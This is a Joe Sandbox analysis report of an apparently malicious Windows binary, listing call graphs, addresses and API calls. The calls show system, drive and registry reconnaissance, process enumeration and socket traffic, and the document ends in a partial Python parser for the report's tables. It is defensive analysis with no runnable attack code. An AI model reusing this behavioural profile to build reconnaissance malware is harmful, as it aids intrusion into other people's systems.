MD5 hash: 81FAA857E0E440955735ED78A8C61DDD
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true


Execution Graph

Execution Coverage: 3.7%
Dynamic/Decrypted Code Coverage: 15.4%
Signature Coverage: 11%
Total number of Nodes: 689
Total number of Limit Nodes: 106
                                                              execution_graph 72254 1317830 72267 121dd50 72254->72267 72256 1317866 72257 131785a 72257->72256 72271 12212c0 72257->72271 72259 13178a6 72260 131789a 72260->72259 72261 1317950 72260->72261 72263 1317906 72260->72263 72275 121b500 localeconv localeconv 72261->72275 72264 1317944 72263->72264 72276 121b500 localeconv localeconv 72263->72276 72265 1317979 72268 121dd61 72267->72268 72277 121d1d0 72268->72277 72270 121dd89 72270->72257 72272 12212cc 72271->72272 72284 121e050 72272->72284 72274 12212fa 72274->72260 72275->72265 72276->72265 72283 121d1ed 72277->72283 72278 121d504 localeconv 72278->72283 72279 121c9c0 localeconv 72279->72283 72280 121ca50 localeconv 72280->72283 72281 121d3ae 72281->72270 72282 121cc90 localeconv 72282->72283 72283->72278 72283->72279 72283->72280 72283->72281 72283->72282 72285 121e09d localeconv localeconv 72284->72285 72298 121e503 72284->72298 72291 121e0ce 72285->72291 72286 121e18e 72288 121ed90 ungetc 72286->72288 72297 121e1a6 72286->72297 72287 1220250 ungetc 72287->72298 72288->72297 72289 121fee7 72305 121dff0 ungetc 72289->72305 72290 121feb6 isxdigit 72290->72298 72291->72286 72295 121e388 72291->72295 72291->72297 72291->72298 72299 121e243 72291->72299 72293 1220742 ungetc 72293->72297 72294 12211a4 ungetc 72294->72298 72295->72297 72295->72298 72304 12200b8 ungetc 72295->72304 72296 12208d7 ungetc 72296->72298 72297->72274 72298->72287 72298->72289 72298->72290 72298->72294 72298->72296 72298->72297 72298->72299 72301 1220e3e ungetc 72298->72301 72303 1220006 ungetc 72298->72303 72306 121dff0 ungetc 72298->72306 72307 121b1a0 islower islower 72298->72307 72299->72293 72299->72297 72301->72298 72303->72298 72304->72295 72305->72297 72306->72298 72307->72298 72308 ead5e0 72309 ead652 WSAStartup 72308->72309 72310 ead5f0 72308->72310 72309->72310 72311 ead664 72309->72311 72313 ead67c 72310->72313 72315 ead690 localeconv localeconv 72310->72315 72314 ead5fa 
72315->72314 72316 ea1139 72332 ecbaa0 72316->72332 72318 ea1148 72319 ea1512 72318->72319 72321 ea1161 72318->72321 72322 ea1527 72319->72322 72340 e9fec0 12 API calls 72319->72340 72329 ea0f00 72321->72329 72336 ea0150 72321->72336 72322->72329 72341 ea22d0 12 API calls 72322->72341 72326 ea0150 localeconv localeconv 72326->72329 72328 ea0f7b 72329->72326 72329->72328 72331 e975a0 localeconv localeconv 72329->72331 72342 ecd4d0 7 API calls 72329->72342 72343 ea4940 localeconv localeconv 72329->72343 72344 ea3900 localeconv localeconv 72329->72344 72331->72329 72333 ecbb60 72332->72333 72335 ecbac7 72332->72335 72333->72318 72335->72333 72345 eb05b0 localeconv localeconv 72335->72345 72338 ea0167 72336->72338 72337 ea01c3 72337->72329 72338->72337 72346 ea30d0 localeconv localeconv 72338->72346 72340->72322 72341->72329 72342->72329 72343->72329 72344->72329 72345->72333 72346->72337 72347 f44720 72351 f44728 72347->72351 72348 f44733 72350 f44774 72351->72348 72358 f4476c 72351->72358 72359 f45540 7 API calls 72351->72359 72353 f4482e 72353->72358 72360 f49270 72353->72360 72355 f44860 72365 f44950 72355->72365 72357 f44878 72358->72357 72371 f430a0 7 API calls 72358->72371 72359->72353 72372 f4a440 72360->72372 72362 f49297 72364 f492ab 72362->72364 72403 f4bbe0 7 API calls 72362->72403 72364->72355 72366 f44966 72365->72366 72368 f449c5 72366->72368 72370 f449b9 72366->72370 72404 f4bbe0 7 API calls 72366->72404 72367 f44aa0 gethostname 72367->72368 72367->72370 72368->72358 72370->72367 72370->72368 72371->72350 72398 f4a46b 72372->72398 72373 f4aa03 RegOpenKeyExA 72374 f4aa27 RegQueryValueExA 72373->72374 72375 f4ab70 RegOpenKeyExA 72373->72375 72376 f4aa71 72374->72376 72377 f4aacc RegQueryValueExA 72374->72377 72378 f4ac34 RegOpenKeyExA 72375->72378 72395 f4ab90 72375->72395 72376->72377 72384 f4aa85 RegQueryValueExA 72376->72384 72380 f4ab66 RegCloseKey 72377->72380 72381 f4ab0e 72377->72381 72379 f4acf8 RegOpenKeyExA 72378->72379 72397 f4ac54 72378->72397 
72382 f4ad56 RegEnumKeyExA 72379->72382 72385 f4ad14 72379->72385 72380->72375 72381->72380 72388 f4ab1e RegQueryValueExA 72381->72388 72383 f4ad9b 72382->72383 72382->72385 72386 f4ae16 RegOpenKeyExA 72383->72386 72387 f4aab3 72384->72387 72385->72362 72389 f4ae34 RegQueryValueExA 72386->72389 72390 f4addf RegEnumKeyExA 72386->72390 72387->72377 72392 f4ab4c 72388->72392 72391 f4af43 RegQueryValueExA 72389->72391 72402 f4adaa 72389->72402 72390->72385 72390->72386 72393 f4b052 RegQueryValueExA 72391->72393 72391->72402 72392->72380 72394 f4adc7 RegCloseKey 72393->72394 72393->72402 72394->72390 72395->72378 72396 f4afa0 RegQueryValueExA 72396->72402 72397->72379 72399 f4d190 localeconv localeconv 72398->72399 72400 f4a4db 72398->72400 72401 f4b180 localeconv localeconv 72398->72401 72399->72398 72400->72373 72400->72385 72401->72398 72402->72391 72402->72393 72402->72394 72402->72396 72403->72364 72404->72370 72405 e929ff FindFirstFileA 72406 e92a31 72405->72406 72407 e92a5c RegOpenKeyExA 72406->72407 72408 e92a93 72407->72408 72409 e92ade CharUpperA 72408->72409 72410 e92b0a 72409->72410 72411 e92bf9 QueryFullProcessImageNameA 72410->72411 72412 e92c3b CloseHandle 72411->72412 72414 e92c64 72412->72414 72413 e92df1 CloseHandle 72415 e92e23 72413->72415 72414->72413 72416 e9f7b0 72417 e9f97a 72416->72417 72421 e9f7c3 72416->72421 72418 ea0150 2 API calls 72425 e9f854 72418->72425 72419 e9f932 72439 eccd80 72419->72439 72421->72417 72421->72418 72422 e9f942 72423 e9f987 72422->72423 72424 ee1390 2 API calls 72422->72424 72460 ee1390 72423->72460 72424->72422 72425->72417 72425->72419 72468 e9fec0 12 API calls 72425->72468 72429 ee1390 2 API calls 72430 e9f9a0 72429->72430 72431 ee1390 2 API calls 72430->72431 72432 e9f9ac 72431->72432 72433 e9f9bb WSACloseEvent 72432->72433 72464 e975a0 72433->72464 72436 e975a0 2 API calls 72437 e9fa12 72436->72437 72438 e975a0 2 API calls 72437->72438 72438->72417 72440 ecd0f1 72439->72440 72447 eccd9a 72439->72447 72440->72422 
72441 ecd0e5 72442 ee1390 2 API calls 72441->72442 72442->72440 72443 ecd0b4 72490 eaf6c0 12 API calls 72443->72490 72447->72441 72453 ecce6b 72447->72453 72469 ecdc30 7 API calls 72447->72469 72448 ecd064 72448->72443 72489 ecde00 7 API calls 72448->72489 72451 ecd016 72451->72448 72488 ecde00 7 API calls 72451->72488 72453->72448 72455 eccf4b 72453->72455 72470 ecdc30 7 API calls 72453->72470 72455->72451 72456 ecd018 72455->72456 72471 ece130 7 API calls 72455->72471 72472 ecdf30 72455->72472 72478 ea6fa0 72455->72478 72486 ea7380 localeconv localeconv 72455->72486 72487 ea7380 localeconv localeconv 72456->72487 72461 ee139d 72460->72461 72463 e9f98d 72460->72463 72462 e975a0 2 API calls 72461->72462 72462->72463 72463->72429 72465 e975aa 72464->72465 72467 e975d1 72464->72467 72465->72467 72493 e972a0 localeconv localeconv 72465->72493 72467->72436 72468->72425 72469->72447 72470->72453 72471->72455 72475 ecdf44 72472->72475 72473 ecdfb5 72473->72455 72475->72473 72476 ecdfb9 72475->72476 72491 ea7450 localeconv localeconv 72475->72491 72492 ea7380 localeconv localeconv 72476->72492 72479 ea6fd4 72478->72479 72480 ea6feb 72478->72480 72479->72480 72481 ea7207 select 72479->72481 72480->72455 72481->72480 72485 ea7233 72481->72485 72482 ea726b __WSAFDIsSet 72483 ea729a __WSAFDIsSet 72482->72483 72482->72485 72484 ea72ba __WSAFDIsSet 72483->72484 72483->72485 72484->72485 72485->72480 72485->72482 72485->72483 72485->72484 72486->72455 72487->72451 72488->72451 72489->72448 72490->72441 72491->72475 72492->72473 72493->72467 72494 ec95b0 72495 ec95c8 72494->72495 72496 ec95fd 72494->72496 72495->72496 72498 eca150 72495->72498 72499 eca15f 72498->72499 72508 eca246 72498->72508 72500 eca181 getsockname 72499->72500 72499->72508 72501 eca1f7 72500->72501 72503 eca1d0 72500->72503 72511 ecef30 72501->72511 72510 ead090 localeconv localeconv 72503->72510 72505 eca1eb 72521 ed4f40 localeconv localeconv 72505->72521 72508->72496 72510->72505 72512 ecefa8 72511->72512 
72513 ecef47 72511->72513 72519 eca20f 72512->72519 72524 e9c960 localeconv localeconv 72512->72524 72514 ecef4c 72513->72514 72515 ecef81 72513->72515 72514->72519 72522 ef3d10 localeconv localeconv 72514->72522 72523 ef3d10 localeconv localeconv 72515->72523 72519->72508 72520 ead090 localeconv localeconv 72519->72520 72520->72505 72521->72508 72522->72519 72523->72519 72524->72519 72525 ec6ab0 72526 ec6ad5 72525->72526 72527 ec6bb4 72526->72527 72529 ea6fa0 4 API calls 72526->72529 72528 f45ed0 11 API calls 72527->72528 72530 ec6ba9 72528->72530 72531 ec6b54 72529->72531 72531->72527 72531->72530 72532 ec6b5d 72531->72532 72532->72530 72534 f45ed0 72532->72534 72537 f45a50 72534->72537 72536 f45ee5 72536->72532 72538 f45a58 72537->72538 72545 f45ea0 72537->72545 72539 f45b50 72538->72539 72552 f45b88 72538->72552 72553 f45a99 72538->72553 72542 f45eb4 72539->72542 72543 f45b7a 72539->72543 72539->72552 72540 f45e96 72578 f59480 7 API calls 72540->72578 72579 f46f10 7 API calls 72542->72579 72564 f470a0 72543->72564 72545->72536 72548 f45ec2 72548->72548 72550 f45be2 __WSAFDIsSet 72550->72553 72551 f45da1 __WSAFDIsSet 72558 f45cae 72551->72558 72552->72558 72574 f46d50 localeconv localeconv 72552->72574 72575 f45ef0 6 API calls 72552->72575 72553->72550 72553->72552 72556 f470a0 8 API calls 72553->72556 72573 f46f10 7 API calls 72553->72573 72556->72553 72558->72540 72558->72551 72560 f5a920 72558->72560 72576 f46d50 localeconv localeconv 72558->72576 72577 f59320 7 API calls 72558->72577 72561 f5a944 72560->72561 72562 f5a94b 72561->72562 72563 f5a977 send 72561->72563 72562->72558 72563->72558 72565 f470ae 72564->72565 72567 f4717f 72565->72567 72572 f471a7 72565->72572 72580 f5a8c0 72565->72580 72584 f471c0 6 API calls 72565->72584 72567->72572 72585 f46d50 localeconv localeconv 72567->72585 72569 f4719f 72586 f59320 7 API calls 72569->72586 72572->72552 72573->72553 72574->72552 72575->72552 72576->72558 72577->72558 72578->72545 72579->72548 72581 f5a8e6 
72580->72581 72582 f5a903 recvfrom 72580->72582 72581->72582 72583 f5a8ed 72581->72583 72582->72583 72583->72565 72584->72565 72585->72569 72586->72572 72587 7170408 72588 71703d5 Process32FirstW 72587->72588 72590 7170412 72587->72590 72588->72590 72591 e913c9 72594 e91160 72591->72594 72595 e913a1 72594->72595 72596 12193e0 72594->72596 72606 1218a20 16 API calls 72594->72606 72597 12193f3 72596->72597 72603 1219400 72596->72603 72597->72594 72598 1219688 72598->72597 72599 12196c7 72598->72599 72607 1219280 vfprintf 72598->72607 72608 1219220 vfprintf 72599->72608 72602 12196df 72602->72594 72603->72597 72603->72598 72603->72599 72604 1219220 vfprintf 72603->72604 72605 1219280 vfprintf 72603->72605 72604->72603 72605->72603 72606->72594 72607->72598 72608->72602 72609 131f250 72617 1221360 72609->72617 72611 131f28e 72612 131f282 72612->72611 72613 1221360 2 API calls 72612->72613 72614 131f2d3 72613->72614 72616 131f2ec 72614->72616 72624 1221420 localeconv localeconv 72614->72624 72618 12213b0 72617->72618 72619 1221379 72617->72619 72621 121d1d0 2 API calls 72618->72621 72620 121d1d0 2 API calls 72619->72620 72622 1221398 72620->72622 72623 12213d0 72621->72623 72622->72612 72623->72612 72624->72616 72625 121b180 Sleep 72626 ecb3c0 72627 ecb3ee 72626->72627 72628 ecb3cb 72626->72628 72632 ec9290 72628->72632 72646 e976a0 72628->72646 72629 ecb3ea 72633 e976a0 3 API calls 72632->72633 72634 ec92e5 72633->72634 72635 ec93c3 72634->72635 72636 ec92f3 72634->72636 72640 ec9392 72635->72640 72657 ead090 localeconv localeconv 72635->72657 72639 ec9335 WSAIoctl 72636->72639 72636->72640 72638 ec93f7 72658 ed4f40 localeconv localeconv 72638->72658 72639->72640 72643 ec9366 72639->72643 72644 ec93be 72640->72644 72659 ed50a0 localeconv localeconv 72640->72659 72643->72640 72645 ec9371 setsockopt 72643->72645 72644->72629 72645->72640 72647 e976c0 72646->72647 72648 e976e6 send 72646->72648 72647->72648 72650 e976c9 72647->72650 72649 e976d3 72648->72649 72653 e97704 
72648->72653 72660 e972a0 localeconv localeconv 72649->72660 72650->72649 72652 e9770b 72650->72652 72661 e972a0 localeconv localeconv 72652->72661 72653->72629 72655 e9771c 72662 e9cb20 localeconv localeconv 72655->72662 72657->72638 72658->72640 72659->72644 72660->72653 72661->72655 72662->72653 72663 ece400 72664 ece412 72663->72664 72668 ece459 72663->72668 72665 ece422 72664->72665 72687 ee3030 localeconv localeconv 72664->72687 72688 ef09d0 localeconv localeconv 72665->72688 72669 ece4a8 72668->72669 72674 ece495 72668->72674 72675 ecb5a0 72668->72675 72670 ece42b 72689 ec68b0 7 API calls 72670->72689 72673 ecb5a0 2 API calls 72673->72669 72674->72669 72674->72673 72676 ecb5d2 72675->72676 72677 ecb5c0 72675->72677 72676->72674 72677->72676 72678 ecb713 72677->72678 72681 ecb626 72677->72681 72691 ed4f40 localeconv localeconv 72678->72691 72680 ecb65a 72680->72676 72682 ecb72b 72680->72682 72683 ecb737 72680->72683 72681->72676 72681->72680 72681->72682 72681->72683 72690 ed50a0 localeconv localeconv 72681->72690 72682->72676 72692 ed50a0 localeconv localeconv 72682->72692 72683->72676 72693 ed50a0 localeconv localeconv 72683->72693 72687->72665 72688->72670 72689->72668 72690->72681 72691->72676 72692->72676 72693->72676 72694 ecb400 72695 ecb40b 72694->72695 72696 ecb425 72694->72696 72699 e97770 72695->72699 72697 ecb421 72700 e97790 72699->72700 72701 e977b6 recv 72699->72701 72700->72701 72702 e97799 72700->72702 72703 e977a3 72701->72703 72709 e977d4 72701->72709 72702->72703 72704 e977db 72702->72704 72710 e972a0 localeconv localeconv 72703->72710 72711 e972a0 localeconv localeconv 72704->72711 72707 e977ec 72712 e9cb20 localeconv localeconv 72707->72712 72709->72697 72710->72709 72711->72707 72712->72709 72713 ed0700 72721 ed0719 72713->72721 72727 ed099d 72713->72727 72716 ed09f6 72724 e975a0 2 API calls 72716->72724 72718 ed09b5 72718->72727 72738 ed50a0 localeconv localeconv 72718->72738 72720 ed0a35 72739 ed4f40 localeconv localeconv 72720->72739 
72721->72716 72721->72718 72721->72720 72721->72727 72731 e97310 localeconv localeconv 72721->72731 72732 ecb8e0 localeconv localeconv 72721->72732 72733 eff570 localeconv localeconv 72721->72733 72734 ebeb30 localeconv localeconv 72721->72734 72735 ef13a0 localeconv localeconv 72721->72735 72736 f139a0 localeconv localeconv 72721->72736 72737 ebeae0 localeconv localeconv 72721->72737 72728 ed0a11 72724->72728 72729 e975a0 2 API calls 72728->72729 72729->72727 72731->72721 72732->72721 72733->72721 72734->72721 72735->72721 72736->72721 72737->72721 72738->72727 72739->72727 72740 ecf6c3 72743 ecf6e3 72740->72743 72748 ecf7b9 72740->72748 72741 ecf72e 72742 ecf7f4 72741->72742 72747 ecf743 72741->72747 72744 ecf800 72742->72744 72760 ed0c80 localeconv localeconv 72742->72760 72743->72741 72756 ed50a0 localeconv localeconv 72743->72756 72747->72744 72753 ed50a0 localeconv localeconv 72747->72753 72757 e9fa50 localeconv localeconv 72747->72757 72758 ed0d30 localeconv localeconv 72747->72758 72748->72743 72748->72744 72759 ed4fd0 localeconv localeconv 72748->72759 72749 ecff5b 72755 ed0034 72749->72755 72761 ed50a0 localeconv localeconv 72749->72761 72753->72747 72756->72741 72757->72747 72758->72747 72759->72743 72760->72749 72761->72755 72762 e9255d 72810 1219f70 72762->72810 72765 e92589 72766 e925a0 GlobalMemoryStatusEx 72765->72766 72767 e925ec 72766->72767 72812 7130008 72767->72812 72816 7130028 72767->72816 72820 713016c 72767->72820 72824 71302aa 72767->72824 72828 7130368 72767->72828 72832 7130220 72767->72832 72836 7130260 72767->72836 72840 71303bd 72767->72840 72844 71301e1 72767->72844 72848 71300bf 72767->72848 72852 713037e 72767->72852 72856 71302f6 72767->72856 72860 7130076 72767->72860 72864 71301b2 72767->72864 72868 7130130 72767->72868 72872 7130233 72767->72872 72876 7130372 72767->72876 72880 713039c 72767->72880 72884 713028f 72767->72884 72888 7130000 72767->72888 72892 71301c4 72767->72892 72896 7130101 72767->72896 72900 7130200 
72767->72900 72904 7130143 72767->72904 72908 71302c1 72767->72908 72912 713009e 72767->72912 72916 7130156 72767->72916 72920 71300d4 72767->72920 72924 7130058 72767->72924 72928 7130317 72767->72928 72932 71302d0 72767->72932 72936 71301d1 72767->72936 72940 7130352 72767->72940 72811 e9256c GetSystemInfo 72810->72811 72811->72765 72813 713000c GetLogicalDrives 72812->72813 72815 713040f 72813->72815 72817 7130067 GetLogicalDrives 72816->72817 72819 713040f 72817->72819 72821 7130185 GetLogicalDrives 72820->72821 72823 713040f 72821->72823 72825 71302c6 GetLogicalDrives 72824->72825 72827 713040f 72825->72827 72829 7130377 GetLogicalDrives 72828->72829 72831 713040f 72829->72831 72833 713022c GetLogicalDrives 72832->72833 72835 713040f 72833->72835 72837 7130206 GetLogicalDrives 72836->72837 72839 713040f 72837->72839 72841 713037e GetLogicalDrives 72840->72841 72843 713040f 72841->72843 72845 7130208 GetLogicalDrives 72844->72845 72847 713040f 72845->72847 72849 71300c5 GetLogicalDrives 72848->72849 72851 713040f 72849->72851 72853 7130389 GetLogicalDrives 72852->72853 72855 713040f 72853->72855 72857 7130328 GetLogicalDrives 72856->72857 72859 713040f 72857->72859 72861 7130065 GetLogicalDrives 72860->72861 72863 713040f 72861->72863 72865 71301b5 GetLogicalDrives 72864->72865 72867 713040f 72865->72867 72869 71300ce GetLogicalDrives 72868->72869 72871 713040f 72869->72871 72873 7130236 GetLogicalDrives 72872->72873 72875 713040f 72873->72875 72877 7130377 GetLogicalDrives 72876->72877 72879 713040f 72877->72879 72881 71303a1 GetLogicalDrives 72880->72881 72883 713040f 72881->72883 72885 71302a2 GetLogicalDrives 72884->72885 72887 713040f 72885->72887 72889 713000c GetLogicalDrives 72888->72889 72891 713040f 72889->72891 72893 71301d7 GetLogicalDrives 72892->72893 72895 713040f 72893->72895 72897 713010b GetLogicalDrives 72896->72897 72899 713040f 72897->72899 72901 7130208 GetLogicalDrives 72900->72901 72903 713040f 72901->72903 72905 7130162 GetLogicalDrives 
(Remaining call-graph node list omitted; it encoded only the graph's edges. The functions with API calls in this part of the graph are:)
• 071300xx–071303xx: nine basic blocks (07130065, 071300E8, 071300FA, 0713011D, 071301D7, 071302E2, 071302F9, 0713031F, 07130355) each call GetLogicalDrives and converge on 0713040F
• 00F5B180 (called from 00F43C00): socket set-up via 00F5AF30 (socket) and 00F5B060 (connect, WSAGetLastError), getsockname at 00F5B2A9, closesocket at 00F5B020 and 00F5B04B
• 00F59740 (called from 00F5A080): RegOpenKeyExA 00F59925, RegQueryValueExA 00F5995A, RegCloseKey 00F59986
• 00EA05B0 (called from 00E93D30 via 00EA0AB0): WSAEventSelect at 00EA0707 and 00EA09D0, WSAEnumNetworkEvents at 00EA09E8
• 00EC8B50: select with three __WSAFDIsSet tests (via 00EA6E40), connect 00EC8C1F, SleepEx 00EC8CD9, closesocket via 00E978B0; its callee 00ECA550 does socket (via 00E975E0), setsockopt 00ECA811 and ioctlsocket (via 00EF67E0)
• 00E931D7: CloseHandle 00E932DC
• 00E92F17: registry enumeration loop: RegEnumKeyExA 00E9315C, RegOpenKeyExA 00E93046 and 00E91645, RegQueryValueExA 00E93089, RegCloseKey 00E9313B
• 07180427: Process32NextW 0718040C
Most other nodes call localeconv twice; 00E9FCB0 and 00EC6BE0 are summarised by the graph as "12 API calls" and "15 API calls".

Control-flow Graph (rendered graphic omitted; the executed / not executed colouring is not recoverable in text)

Function 00E9255D–00E929FE. Recoverable structure from the graph:
• 00E9255D–00E92614: GetSystemInfo, then GlobalMemoryStatusEx, each followed by helper calls into 01319xxx
• 00E92619: a call that the graph resolves to 33 different stubs in 07130000–071303BD, all returning to 00E9261B
• 00E92626–00E92777: per-drive loop: GetDriveTypeA at 00E9263C, then GetDiskFreeSpaceExA at 00E92655 for drives that pass the type check, with the values processed by helpers at 01318050 and 01319xxx
• 00E9277C–00E92904: KiUserCallbackDispatcher, then FindFirstFileW
• 00E92906–00E92926: FindNextFileW loop
• 00E92928–00E929FE: result handling and return
                                                              APIs
                                                              • GetSystemInfo.KERNELBASE ref: 00E92579
                                                              • GlobalMemoryStatusEx.KERNELBASE ref: 00E925CC
                                                              • GetDriveTypeA.KERNELBASE ref: 00E92647
                                                              • GetDiskFreeSpaceExA.KERNELBASE ref: 00E9267E
                                                              • KiUserCallbackDispatcher.NTDLL ref: 00E927E2
                                                              • FindFirstFileW.KERNELBASE ref: 00E928F8
                                                              • FindNextFileW.KERNELBASE ref: 00E9291F
Memory Dump Source
• Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
• Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                                              • String ID: ;%$@$`
                                                              • API String ID: 3271271169-3130814153
                                                              • Opcode ID: 6bd5817af0586be70f4003ca0afd9a876271906984aaf9d1ce47c14a2f537347
                                                              • Instruction ID: a0434695b3427bc4aee2a911659b8703fe896af1c00ca90d3c200ca9080ebecd
                                                              • Opcode Fuzzy Hash: 6bd5817af0586be70f4003ca0afd9a876271906984aaf9d1ce47c14a2f537347
                                                              • Instruction Fuzzy Hash: 78D1B6B49053199FCB14EF68C59469EBBF0BF48348F01896DE898D7354E7349A88CF92

Control-flow Graph (rendered graphic omitted)

Function 00E929FF–00E92F16. Recoverable structure from the graph (the report's APIs and Strings tables for this function are empty; the calls below are read from the graph nodes):
• 00E929FF–00E92A2F: FindFirstFileA
• 00E92A3D–00E92A91: RegOpenKeyExA
• 00E92A9F–00E92B0C: CharUpperA, then helper 01218DA0
• 00E92BCC–00E92C66: QueryFullProcessImageNameA, CloseHandle, helper 01218DA0; the blocks 00E92B94–00E92BCA loop back to this block
• 00E92CEF–00E92DC9: a second loop of helper calls (01218BB0, 01218DA0, 01218E68)
• 00E92DCF–00E92E1C: CloseHandle
• 00E92E21: a call that the graph resolves to five stubs at 071B0DDC, 071B0DEA, 071B0E0B, 071B0E22 and 071B0E4A, all returning to 00E92E23
• 00E92E3C–00E92F16: result handling and return
Memory Dump Source: same dump set as listed for function 00E9255D above (source 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000).
                                                              Similarity
                                                              • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                              • String ID: 0
                                                              • API String ID: 2406880114-4108050209
                                                              • Opcode ID: 572db9099ecdf94b2637e3b51358e6c93385103f36abeefb86851519e10c0d0d
                                                              • Instruction ID: cea214daaa10ef04d12a638ebeadc7fb8203f978daffc802202a7d11b8f60807
                                                              • Opcode Fuzzy Hash: 572db9099ecdf94b2637e3b51358e6c93385103f36abeefb86851519e10c0d0d
                                                              • Instruction Fuzzy Hash: B7E1E7B49053059FCB10EF69D98469DBBF4AF58308F00887EE998DB354E7359988CF42

Control-flow Graph (rendered graphic omitted)

Function 00EA05B0–00EA0AA4. Recoverable structure from the graph:
• 00EA05F6–00EA0620: calls 00EA7350 and 00E970B0; 00EA0630–00EA0655: calls 00E970D0, 00EA03C0 and 00EA7450; 00EA066A–00EA068C: call 00ECDEC0
• 00EA06B0–00EA06E4: loop calling 00EA73B0
• 00EA0707–00EA0719: WSAEventSelect (the call at 00EA0712), reached from the 00EA072C–00EA07C2 loop, which also calls 00E976A0
• 00EA07EF–00EA082B: call 00EA3000; 00EA0839–00EA084C: call 00EA6FA0; 00EA0A58–00EA0A81: call 00EA2F10; 00EA0A87–00EA0A97: call 00EA6DF0
• 00EA09E8–00EA0A03: WSAEnumNetworkEvents, alternating in a loop with WSAEventSelect at 00EA09D0–00EA09E6 (the call at 00EA09DD, third argument 0) and helper 00E970E0
• 00EA07D6–00EA07E3: common exit through 00EA7380
                                                              APIs
                                                              • WSAEventSelect.WS2_32(?,?,?), ref: 00EA0712
                                                              • WSAEventSelect.WS2_32(?,?,00000000), ref: 00EA09DD
                                                              • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 00EA09FB
Memory Dump Source: same dump set as listed for function 00E9255D above (source 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000).
                                                              Similarity
                                                              • API ID: EventSelect$EnumEventsNetwork
                                                              • String ID: N=$multi.c
                                                              • API String ID: 2170980988-1544942961
                                                              • Opcode ID: 83c786f946a5785352067e00c88c7e802a52468c4d4a1fb03bccb35388d5ff87
                                                              • Instruction ID: e98acf648286af57b101d23581c26f0f56bd69b5c5c0bc5894751a8fbfbcc7a6
                                                              • Opcode Fuzzy Hash: 83c786f946a5785352067e00c88c7e802a52468c4d4a1fb03bccb35388d5ff87
                                                              • Instruction Fuzzy Hash: 86D1BF756083019FEB10DF24C881BAB77E5FF9A348F04582DF885AA252E774F958CB52

Control-flow Graph (rendered graphic omitted)

Function 00E97770–00E97832. Recoverable structure from the graph (the report's APIs and Strings tables for this function are empty; the format strings appear under String ID below):
• 00E97770–00E9778E: entry, branching to 00E97790 or straight to the recv block
• 00E97790–00E977A1: checks; one branch bypasses recv and goes to 00E977DB
• 00E977B6–00E977C2: recv
• 00E977C4–00E977D9: after recv, call 00E972A0
• 00E977DB–00E97829: calls 00E972A0, 00E9CB20 and 01218C50 (the path that skipped recv)
• 00E9782E–00E97832: return
Memory Dump Source: same dump set as listed for function 00E9255D above (source 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000).
                                                              Similarity
                                                              • API ID: recv
                                                              • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                              • API String ID: 1507349165-640788491
                                                              • Opcode ID: 66727a175ac549bd239750a93b1463eabd91f1fc0710b8b813d3c5745a3ee211
                                                              • Instruction ID: 79eb632cf501fdee9899880793a608709fd4e8d6e17846d60de1b9fa22cda5f7
                                                              • Opcode Fuzzy Hash: 66727a175ac549bd239750a93b1463eabd91f1fc0710b8b813d3c5745a3ee211
                                                              • Instruction Fuzzy Hash: 841108B46283447BE930A626DC49E273B9CDB81B78F55152DB89877291E1319C0C86F2
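As an added triage example (not part of the Joe Sandbox report): the APIs and String ID tables above are regular enough to parse, which lets an analyst summarise what each function does before opening the disassembly. The script below parses lines of the form `• Name.MODULE(args), ref: ADDR` and `• String ID: a$b$c`, groups the API names into behaviour buckets, and flags format strings that identify an embedded library. The bucket table and the library-marker table are the example's own assumptions, not report output; the library attribution rests on the fact that `LIMIT %s:%d %s reached memlimit` and `RECV %s:%d recv(%lu) = %ld` are the exact format strings of libcurl's `lib/memdebug.c` (compiled in only for CURLDEBUG builds), and that `multi.c` is a libcurl source-file name. The sample text is constructed from entries copied from this report's tables.

```python
"""Triage helper for the APIs / String ID tables of a Joe Sandbox report.
Added example, not part of the report. Bucket table, library markers and the
sample text are the example's own assumptions (sample lines copied from the
report's per-function tables)."""
import re
from collections import defaultdict

# "• GetSystemInfo.KERNELBASE ref: 00E92579"
# "• WSAEventSelect.WS2_32(?,?,00000000), ref: 00EA09DD"
API_LINE = re.compile(
    r"^\s*[•*-]?\s*(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
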